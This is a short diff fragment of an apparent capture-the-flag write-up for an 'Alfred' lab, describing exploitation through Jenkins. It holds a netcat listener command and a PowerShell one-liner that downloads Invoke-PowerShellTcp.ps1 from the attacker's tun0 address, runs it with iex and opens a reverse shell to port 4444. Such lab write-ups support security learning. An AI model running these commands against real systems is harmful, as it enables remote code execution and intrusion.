RG9n/RG9n.github.io/write-ups/alfred.md

 rlwrap nc -lvnp 4444
 ```

-* Update and build the following powershell that will transfer and execute the powershell script on the server.
+* Update and build the powershell command in Jenkins to transfer the Invoke-PowerShellTcp.ps1 from the server to the target and execute the script.

 ```ps
 powershell iex (New-Object Net.WebClient).DownloadString('http://Tun0-IP:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress Tun0-IP -Port 4444